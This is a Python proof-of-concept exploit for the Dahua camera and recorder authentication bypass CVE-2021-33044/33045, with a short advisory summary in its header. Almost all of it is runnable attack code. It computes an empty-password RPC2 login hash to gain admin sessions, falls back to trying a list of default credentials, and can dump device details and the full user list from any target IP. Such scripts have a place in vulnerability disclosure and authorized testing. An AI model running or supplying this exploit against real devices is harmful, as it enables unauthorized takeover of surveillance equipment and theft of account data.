#!/usr/bin/env python3 """ Dahua Authentication Bypass PoC CVE-2021-33044 & CVE-2021-33045 Real vulnerability (Source: NVD / Dahua Security Advisory DSA-2021-001): "The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets." CVSS: 9.8 CRITICAL | CWE-287 (Improper Authentication) In CISA Known Exploited Vulnerabilities Catalog (added 2024-08-21) Ref: https://packetstormsecurity.com/files/164423/Dahua-Authentication-Bypass.html http://seclists.org/fulldisclosure/2021/Oct/13 CVE-2021-33044: Affects IPC-HUM7xxx, IPC-HX3xxx, IPC-HX5xxx, TPC-*, VTO-*, VTH-* Firmware < 2.820.0000000.5.r.210705 (IPC) / 2.630.x (TPC) CVE-2021-33045: Same IPC models PLUS NVR-1xxx/2xxx/4xxx/5xxx/6xx, XVR-4x*/5x*/7x* Firmware < 4.001.x Attack method: The RPC2 login challenge-response uses: step1 = MD5("user:realm:PASSWORD") <- attacker leaves PASSWORD empty step2 = MD5("step1:random:step1") Vulnerable firmware incorrectly accepts step1 computed with an empty password, granting full admin access without knowing the actual password. """ import requests import hashlib import json import argparse import sys requests.packages.urllib3.disable_warnings() # --------------------------------------------------------------------------- # RPC2 helpers # --------------------------------------------------------------------------- def rpc2_get_challenge(target, port, timeout=8, http=None): """ Step 1 of login: send empty-password probe to get server realm + random nonce. The camera always responds with these even before auth is verified. """ url = f"http://{target}:{port}/RPC2_Login" payload = { "method": "global.login", "params": { "userName": "admin", "password": "", "clientType": "Web3.0", "loginType": "Direct", "authorityType": "Default", "passwordType": "Default" }, "id": 1, "session": 0 } try: r = (http or requests).post(url, json=payload, timeout=timeout, verify=False) data = r.json() realm = data.get("params", {}).get("realm", "") random = data.get("params", {}).get("random", "") return realm, random, data except Exception as e: return None, None, str(e) def rpc2_bypass_hash(username, realm, random_str): """ CVE-2021-33044 / CVE-2021-33045 bypass. A correct client computes: step1 = MD5("{user}:{realm}:{PASSWORD}") step2 = MD5("{step1}:{random}:{step1}") The bypass: use an EMPTY password field in step1. Vulnerable Dahua firmware does not distinguish between an empty-password hash and a valid-credential hash, so it grants access. """ step1 = hashlib.md5(f"{username}:{realm}:".encode()).hexdigest().upper() step2 = hashlib.md5(f"{step1}:{random_str}:{step1}".encode()).hexdigest().upper() return step2 def rpc2_legit_hash(username, password, realm, random_str): """Correct hash used for default-cred testing on patched devices.""" step1 = hashlib.md5(f"{username}:{realm}:{password}".encode()).hexdigest().upper() step2 = hashlib.md5(f"{step1}:{random_str}:{step1}".encode()).hexdigest().upper() return step2 def rpc2_send_login(target, port, username, pw_hash, session=0, timeout=8, http=None): """Step 2: submit the hash and return the JSON response.""" url = f"http://{target}:{port}/RPC2_Login" payload = { "method": "global.login", "params": { "userName": username, "password": pw_hash, "clientType": "Web3.0", "loginType": "Direct", "authorityType": "Default", "passwordType": "Default" }, "id": 2, "session": session } try: r = (http or requests).post(url, json=payload, timeout=timeout, verify=False) return r.json() except Exception as e: return {"error": str(e)} # --------------------------------------------------------------------------- # Core bypass # --------------------------------------------------------------------------- def exploit_auth_bypass(target, port=80, timeout=8): """ Full CVE-2021-33044 / CVE-2021-33045 auth bypass. Returns (success, session_id, response). """ http = requests.Session() http.verify = False print(f"[*] Probing RPC2 challenge from {target}:{port} ...") realm, random_str, raw1 = rpc2_get_challenge(target, port, timeout, http=http) if not realm: print(f"[-] Could not reach RPC2_Login: {raw1}") return False, None, raw1 sess = raw1.get("session", 0) if isinstance(raw1, dict) else 0 print(f"[+] Challenge realm='{realm}' random='{random_str}' session={sess}") bypass_hash = rpc2_bypass_hash("admin", realm, random_str) print(f"[*] Sending bypass hash (empty-password): {bypass_hash}") resp = rpc2_send_login(target, port, "admin", bypass_hash, sess, timeout, http=http) if resp.get("result") is True: session_id = resp.get("session", "") print(f"\n[!!!] BYPASS SUCCESSFUL (CVE-2021-33044/33045)") print(f"[!!!] Session ID : {session_id}") return True, session_id, resp else: err = resp.get("error", {}) print(f"[-] Bypass rejected code={err.get('code')} msg={err.get('message')}") print(f" Target may be patched or RPC2 is not on this port.") return False, None, resp def test_default_creds(target, port=80, timeout=8): """Fallback: try default passwords via the correct hash on a patched device.""" defaults = [ ("admin", ""), ("admin", "admin"), ("admin", "888888"), ("admin", "666666"), ("admin", "123456"), ("666666", "666666"), ("888888", "888888"), ] http = requests.Session() http.verify = False print("\n[*] Trying default credentials ...") realm, random_str, raw = rpc2_get_challenge(target, port, timeout, http=http) if not realm: print("[-] RPC2 unreachable skipping") return None sess = raw.get("session", 0) if isinstance(raw, dict) else 0 for user, pw in defaults: h = rpc2_legit_hash(user, pw, realm, random_str) resp = rpc2_send_login(target, port, user, h, sess, timeout, http=http) if resp.get("result") is True: print(f"[+] Valid credentials: {user}:{pw!r}") return (user, pw, resp.get("session")) print("[-] No default credentials matched") return None # --------------------------------------------------------------------------- # Post-exploitation # --------------------------------------------------------------------------- def rpc2_call(target, port, session_id, method, params=None, timeout=8): """Authenticated RPC2 call using a live session.""" url = f"http://{target}:{port}/RPC2" try: r = requests.post(url, json={ "method": method, "params": params or {}, "session": session_id, "id": 10 }, timeout=timeout, verify=False) return r.json() except Exception as e: return {"error": str(e)} def dump_info(target, port, session_id): """Pull device info and user list after a successful login.""" print("\n[*] Dumping device info ...") for method in [ "magicBox.getDeviceType", "magicBox.getSoftwareVersion", "magicBox.getSystemInfo", ]: resp = rpc2_call(target, port, session_id, method) print(f" {method}: {resp}") print("\n[*] Dumping user list ...") resp = rpc2_call(target, port, session_id, "userManager.getUserInfoAll") print(f" Users: {json.dumps(resp, indent=2)}") # --------------------------------------------------------------------------- # CLI # --------------------------------------------------------------------------- def main(): parser = argparse.ArgumentParser( description="Dahua Auth Bypass PoC CVE-2021-33044 / CVE-2021-33045", formatter_class=argparse.RawDescriptionHelpFormatter, epilog=""" Examples: python dahua_auth_bypass.py 192.168.1.100 python dahua_auth_bypass.py 192.168.1.100 -p 8080 python dahua_auth_bypass.py 192.168.1.100 --dump """ ) parser.add_argument("target", help="Camera IP or hostname") parser.add_argument("-p", "--port", type=int, default=80, help="HTTP port (default: 80)") parser.add_argument("--dump", action="store_true", help="After bypass, dump device info and user list") parser.add_argument("--timeout", type=int, default=8) args = parser.parse_args() print(f""" Dahua Auth Bypass PoC CVE-2021-33044 / CVE-2021-33045 CVSS 9.8 CRITICAL CWE-287 Target : {args.target}:{args.port} """) ok, session_id, _ = exploit_auth_bypass(args.target, args.port, args.timeout) if not ok: result = test_default_creds(args.target, args.port, args.timeout) if result: ok = True session_id = result[2] if ok and session_id and args.dump: dump_info(args.target, args.port, session_id) sys.exit(0 if ok else 1) if __name__ == "__main__": main()